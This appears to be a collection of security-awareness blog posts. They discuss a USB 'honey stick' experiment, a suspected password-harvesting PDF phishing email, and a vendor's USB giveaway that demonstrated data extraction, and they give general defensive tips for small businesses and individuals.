The Honey Stick Project

It’s time to get streetwise about information security. One of the areas in which I think the security industry has been weak has been in giving small businesses affordable and practical tools for sifting through the mound of technical mumbo-jumbo created each day on the Web.

I imagine that they must feel a bit like high school teenagers walking into a baby’s clothing store… They don’t have much interest, even though - someday soon - they know they will need to know about the stuff.

The Honey Stick Project was my first attempt to raise awareness among small business managers and others who should be aware of the real risks in today’s information world. I still have some new ideas for testing the psychology of how people think about mobile storage devices they find or lose. But the small business problem is much bigger than this, in my view. (more…)

Here’s a simple tip that can save you a lot of trouble.

DON”T ENTER PASSWORDS WHERE YOU AREN’T EXPECTING THEM!!!

I recently came across a suspicious email in my spam folder. It appeared to be from a payroll service I’ve actually dealt with.  There was almost no way to tell for sure if it was from them.

The subject line included a recent date and the word “Paystub”. There was a PDF attachment and even with image loading turned off, there was a label that said “This PDF is password protected”. It had a single field with the word “Password” beside it.

I have yet to determine if this email was authentic or a real phishing attack, aimed at gathering passwords. But if this is a phishing attack, here’s what could happen if I entered a password:

1. The password gets collected, and an error message is produced saying “Invalid password, please try again”.  Knowing that we should all be using different passwords for each site or program “to be secure”, I may simply think I should have used one of my other dozen passwords (don’t we all use that many password variations?!)
2. Hitting “Enter” or clicking on a button causes the password to be sent back to a mothership, including enough information for them to identify my email address as being valid.
3. No only do they now know that this email address is valid, but they have at least one version of my password. If I tried several different ones, they could have them all.

This is dangerous because people think they “NEED TO SEE WHAT’S INSIDE” then encrypted email. It’s like arriving at your office with a wrapped package that has lots of heavy tape sealing it up. The more tape there is protecting it, the more you want to open it to see what it is that could be so sensitive.

To make things worse, there aren’t a lot of easy ways to automatically check for the authenticity of such a package. It can have a digital signature on it, which you could verify. But there are a lot of usability issues yet to be solved in verifying digital signatures in the wild. Enterprises that use Public Key Infrastructure regularly would have an easier time letting people ensure the authenticity of emails and attachments. But most people won’t have that luxury.

So, if you aren’t expecting to be asked for a password (even on a website - which can effectively trick you the same way) you should call up somebody in the originating organization to verify that it is valid, and that it is important. I would also notify them that they should not present password protected information without an easy way to securely verify that it is real.
I am actually surprised that I haven’t seen more evidence of this type of phishing, but I’m sure we will in the future.

There apparently is a rule-book somewhere that says “Never give a woman a gift with a cord or a handle, unless it is a purse filled with money…” The rationale is that the gesture will very likely be taken the wrong way by the recipient, possibly with thoughts of, “You expect me to do housework for the rest of my life?”

Most men only have to make this mistake once to understand the gravity of such a well-intentioned act of generosity. You can also see the effects of such a faux-pas by watching the movie “Father of the Bride” with Steve Martin, where the bride-to-be has a meltdown when the groom gives her a blender as a wedding gift. Dad had to explain to her that it was actually well-intentioned gift, with the thought that maybe someday she’d want to “blend something”…

Now consider the following gift-giving situation in the business world that was nicely documented by William Jackson at “Government Security News” in July 2007 (click HERE). A vendor called Senforce distributed a number of U3 USB drives (i.e. a specially architected type of memory stick) as a marketing give-away, which fulfilled their intended purpose with William perfectly. The intent, apparently, was to raise the awareness of how risky it is to put unknown devices into your computer. He found that the device had been configured with a “supposedly” harmless program that utilized some loopholes in the Windows architecture to demonstrate how easy it was for data to be extracted from your computer in an exploit that Senforce called “Thumbsucking”. (more…)

One thing I’m observing from the early results of the HSP is that a significant number of people are trying to find out how to locate the owner of the device they have found.

In Stream 0, there are no outside markings with contact. In the first two cases of people making contact, they took enough care in opening the files that they didn’t trigger a request to the website, and were not tracked. They did find a plain text file entitled “owner_contact_info.txt”, which contained a phone number, email address and physical address, as well as the HSP website address.

Both finders called the phone number to indicate that they had found the device, and were presumably willing to return it. So, it may facilitate recovery to some extent if you have such a file on your mobile device with enough information to enable somebody to contact you if they find it. Of course, depending on the type of information on the device and on your sensitivity to being identified, you may not want to divulge any personal information, as you don’t know if the potential finder will have good or bad intentions.